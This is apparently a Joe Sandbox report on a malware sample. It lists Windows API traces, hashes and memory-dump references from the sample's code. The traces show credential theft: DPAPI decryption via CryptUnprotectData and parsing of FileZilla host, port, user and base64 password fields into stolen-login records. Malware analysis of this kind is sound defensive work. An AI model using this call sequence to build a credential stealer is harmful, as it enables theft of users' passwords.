                                  • Instruction ID: c280027940da205f5e70ed6eb4f662888585d06f7e76965af44365ebbc444848
                                  • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                  • Instruction Fuzzy Hash: 6001E979A60208FBDB21DFE4C954BEDB7F9EF49740F004189E505A6244D7749A80CF51
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                  • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                  • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                  • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                  • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                  • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                  • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                  APIs
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                    • Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
                                    • Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 022AE709
                                  • StrCmpCA.SHLWAPI(?,004214F8), ref: 022AE759
                                  • StrCmpCA.SHLWAPI(?,004214FC), ref: 022AE76F
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022AEE46
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID:
                                  • API String ID: 433455689-0
                                  • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                  • Instruction ID: 21b972ef193ce41a0d215c957a10669f585f82ce09168c9331c819fa25a883c5
                                  • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                  • Instruction Fuzzy Hash: DB125371A203189BCB1AFBE4DDA5EED733AAF55340F4041ADA10A52198EF346F88CF51
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,022A53EB,40000001,00000000,00000000,?,022A53EB), ref: 022B9127
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                  • Instruction ID: 97673af325b729c2bb9bec190fdb8f72edd1f6bf79ff1e48940ad8b5700f5ce1
                                  • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                  • Instruction Fuzzy Hash: AE11E274224205FFDB01CF94DC49FA733A9AF89794F009554FA098B264D775E882DF60
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                  • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                  • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                  • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022A5155,00000000,00000000), ref: 022A9D56
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,022A5155,00000000,?), ref: 022A9D68
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022A5155,00000000,00000000), ref: 022A9D91
                                  • LocalFree.KERNEL32(?,?,?,?,022A5155,00000000,?), ref: 022A9DA6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                  • Instruction ID: c46186380d8fb042e3ff58984f99ffdc5c66bb2d2ec026027f415599805bb363
                                  • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                  • Instruction Fuzzy Hash: A911A4B4240208BFEB10CFA4CC95FAA77B5EB89704F208058FE159B394C776A941CB90
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 022A9DEB
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 022A9E0A
                                  • memcpy.MSVCRT(?,?,?), ref: 022A9E2D
                                  • LocalFree.KERNEL32(?), ref: 022A9E3A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                  • String ID:
                                  • API String ID: 3243516280-0
                                  • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                  • Instruction ID: 9d1233fe4626e6f0fc529eb42cac19fd823201f8d19405195ba4c83a6560751b
                                  • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                  • Instruction Fuzzy Hash: A6110CB8A00209EFDB04CFA4DA85AAE77B5FF89304F104559F91597350D730AE50CF61
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                  • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                  • LocalFree.KERNEL32(?), ref: 00409BD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                  • String ID:
                                  • API String ID: 3243516280-0
                                  • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                  • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                  • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                  • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00781438,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00781438,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00781438,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                  • wsprintfA.USER32 ref: 00417AB7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 362916592-0
                                  • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                  • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                  • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                  • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                  APIs
                                  • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                  • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                  • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                  • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .$GetProcAddress.$l
                                  • API String ID: 0-2784972518
                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                  • Instruction ID: ea9f522bb3527a43884a08b4ca034a155a17d118f8cad908077d5a37cd01c02f
                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                  • Instruction Fuzzy Hash: DC3149B691060ADFDB20CF99C880BAEBBF5FF48724F14404AD441A7614D7B1EA45CBA4
                                  APIs
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                    • Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
                                    • Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022AF985
                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 022AF9D6
                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 022AF9EC
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022AFD18
                                  • FindClose.KERNEL32(000000FF), ref: 022AFD2A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                                  • Instruction ID: fcfdb4cfbf8b14b049028f26331b2b86f7a5cbfdf3e58261a066c9731e5f4443
                                  • Opcode Fuzzy Hash: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                                  • Instruction Fuzzy Hash: 7711E13082030DABCB2AEBE4DD649ED7336AF21340F4042AAA51A56599EF342B48CF50
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 022BD156
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                  • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                  • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                  • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                  • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                  • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                  • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204131536.0000000000751000.00000040.00000020.00020000.00000000.sdmp, Offset: 00751000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_751000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: +u
                                  • API String ID: 0-2794428999
                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                  • Instruction ID: 5f08f2a7b02cb82b8d26dc134a58070a649f4765a3a82ce9ca7c6c11c89fe80f
                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                  • Instruction Fuzzy Hash: 78117CB2740100AFD744DF55DC81EE673EAEB89321B298069ED08CB312E6B9EC42C760
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                  • Instruction ID: 7859ca23dae42045a41e6d7d825e027845e6c18eb0d072417fa76e253868cad8
                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                  • Instruction Fuzzy Hash: 58012B736206008FDF21CFA0C914FAA33F9FB86305F0540B5E906D7645E370AA41CB80
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: free
                                  • String ID:
                                  • API String ID: 1294909896-0
                                  • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                  • Instruction ID: 135032675c1c3faf63ad7e1c5d8a58c18586287da0a5e8c8ba847f193e87bd00
                                  • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                  • Instruction Fuzzy Hash: 2B71E431471B42EBE76B3BB1DD01ECA7AA37F04382F184924B1DB28534DE326865AF51
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                  • strtok_s.MSVCRT ref: 0041031B
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                  • lstrlenA.KERNEL32(00000000), ref: 00410393
                                    • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                    • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                  • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                  • lstrlenA.KERNEL32(00000000), ref: 00410427
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                  • lstrlenA.KERNEL32(00000000), ref: 00410475
                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                  • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                  • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                  • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                  • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                  • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                  • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                  • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                  • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                  • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                  • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                  • strtok_s.MSVCRT ref: 00410679
                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                  • memset.MSVCRT ref: 004106DD
